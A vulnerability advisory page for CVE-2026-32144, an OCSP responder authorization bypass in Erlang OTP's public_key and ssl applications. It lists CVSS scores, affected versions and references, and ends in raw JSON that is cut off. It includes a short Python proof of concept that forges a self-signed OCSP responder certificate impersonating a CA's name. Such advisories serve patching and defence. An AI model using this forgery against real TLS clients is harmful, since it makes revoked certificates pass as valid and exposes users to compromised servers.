CVE-2026-32144

Description

Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification. The OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid. This affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context. This vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3. This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:erlang:erlang\/public_key:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:erlang:erlang\/ssl:*:*:*:*:*:*:*:* - VULNERABLE

OTP 27.0 - OTP 28.4.2

OTP 27.3.4.10

public_key 1.16 - 1.20.3

public_key 1.17.1.2

ssl 11.2 - 11.5.4

ssl 11.2.12.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
Conceptual PoC for CVE-2026-32144
Generates a forged OCSP Responder Certificate to bypass signature verification.
Note: This requires control over the OCSP response or interception capabilities.
"""
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtensionOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime

# Generate a private key for the forged responder
key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
)

# Extract the Subject Name from the target CA to mimic as Issuer
# In a real attack, this would match the actual CA's Subject
ca_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Fake CA")])

# Create the forged responder certificate
# The key exploit is setting the Issuer to the CA's Name without a real signature
subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Forged OCSP Responder")])

cert = (
    x509.CertificateBuilder()
    .subject_name(subject)
    .issuer_name(ca_name)  # Impersonating the CA as Issuer
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(datetime.datetime.utcnow())
    .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
    # Add the OCSPSigning EKU which is checked, but signature is not
    .add_extension(
        x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6.1.5.5.7.3.9")]), # OCSP Signing
        critical=False,
    )
    .sign(key, hashes.SHA256()) # Self-signed
)

print("Forged Responder Certificate Created:")
print(cert.public_bytes(serialization.Encoding.PEM).decode())

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32144
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32144
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32144/
[4] VulDB https://vuldb.com/cve/CVE-2026-32144
[5] https://cna.erlef.org/cves/CVE-2026-32144.html
[6] https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0
[7] https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891
[8] https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm
[9] https://osv.dev/vulnerability/EEF-CVE-2026-32144
[10] https://www.erlang.org/doc/system/versions.html#order-of-versions

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32144", "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "published": "2026-04-07T13:16:46.570", "lastModified": "2026-04-23T17:32:55.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification.\n\nThe OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid.\n\nThis affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context.\n\nThis vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3.\n\nThis issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7."}], "metrics": {"cvssMetricV40": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*", "versionStartIncluding": "27.0", "versionEndExcluding": "27.3.4.10", "matchCriteriaId": "2771D519-4124-4D3F-A8E0-3E4704973B3E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*", "versionStartIncluding": "28.0", "versionEndExcluding": "28.4.2", "matchCriteriaId": "D2E111DA-579A-438F-A2FF-5799B01AF401"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/public_key:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.16", "versionEndExcluding": "1.17.1.2", "matchCriteriaId": "459DB53B-9049-48D3-86F9-5CB3286BDCFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/public_key:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.18", "versionEndExcluding": "1.20.3", "matchCriteriaId": "2F0812B0-29FA-4EAB-B557-5FB6C8D2D581"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/ssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2", "versionEndExcluding": "11.2.12.7", "matchCriteriaId": "BDA65CE8-5C84-4EAE-8709-44240FB9E2A1"}, {"vulnerable": t ... (truncated)